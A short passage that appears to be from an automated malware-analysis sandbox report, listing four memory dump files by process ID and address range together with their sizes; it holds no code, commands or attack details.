                                                            • memory/21880-43-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/21880-527-0x0000000000400000-0x00000000004BC000-memory.dmp

                                                              Filesize

                                                              752KB

                                                            • memory/22060-129-0x0000000000400000-0x0000000000414000-memory.dmp

                                                              Filesize

                                                              80KB

                                                            • memory/22060-36-0x0000000000400000-0x0000000000414000-memory.dmp

                                                              Filesize

                                                              80KB